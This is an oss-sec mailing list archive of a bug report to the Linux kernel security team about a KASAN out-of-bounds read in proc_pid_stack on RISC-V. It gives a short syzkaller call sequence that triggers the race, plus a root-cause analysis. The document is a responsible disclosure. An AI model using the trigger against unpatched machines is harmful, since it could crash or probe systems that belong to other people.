oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Linux kernel: KASAN: out-of-bounds Read in proc_pid_stack on RISC-V

From: 许佳凯 <xujiakai24 () mails ucas ac cn>
Date: Sat, 11 Oct 2025 14:49:48 +0800 (GMT+08:00)



-----原始邮件-----
发件人:许佳凯 <xujiakai24 () mails ucas ac cn>
发送时间:2025-10-11 14:48:52 (星期六)
收件人: security () kernel org
抄送: paul.walmsley () sifive com, palmer () dabbelt com, aou () eecs berkeley edu, syzkaller () googlegroups com, 
linux-riscv () lists infradead org
主题: [BUG REPORT] KASAN: out-of-bounds Read in proc_pid_stack on RISC-V

Dear Linux Kernel Security Team and Maintainers,
We would like to report a security vulnerability in the Linux kernel, identified as a KASAN out-of-bounds read, which 
we discovered through fuzz testing.

1. Affected Version
The bug was successfully reproduced on the upstream Linux kernel version 6.16, specifically at commit 
038d61fd642278bab63ee8ef722c50d10ab01e8f.


2. Build Configuration
The kernel was built with the accompanying configuration file (see attachment: .config), which includes the necessary 
KASAN options to detect this issue.


3. Proof of Concept and Reproduction
We have provided a reliable C reproducer program (repro.cprog attached) to trigger this bug. Additional diagnostic 
information, including full kernel logs and system context, can be found in the attached files log0, report0, and 
machineInfo0.
The vulnerability is triggered by the following sequence of system calls:
r0 = syz_open_procfs(0x0, &(0x7f0000000000)='stack\x00');
read(r0, &(0x7f0000000040)=""/5, 0x5); // (async)
setsockopt$MRT_INIT(r0, 0x0, 0xc8, 0x0, 0x0);


4. Root Cause Analysis
The core issue is a race condition that corrupts kernel state. The bug occurs when one thread initiates a kernel stack 
walk by reading the /proc/self/stackfile, while a second thread concurrently issues a setsockopt() system call with the 
MRT_INIT command on the same file descriptor. This setsockopt operation is invalid for a proc filesystem file 
descriptor and inadvertently corrupts internal kernel data structures associated with it. This corruption causes the 
first thread's subsequent stack frame traversal (walk_stackframe) to compute an invalid memory address, resulting in an 
out-of-bounds read that is caught by KASAN.


Thank you for your attention to this matter.

Attachment: machineInfo0
Description:

Attachment: report0
Description:

Attachment: repro.cprog
Description:

Attachment: log0
Description:

Attachment: .config
Description:

Previous By Date Next
Previous By Thread Next

Current thread: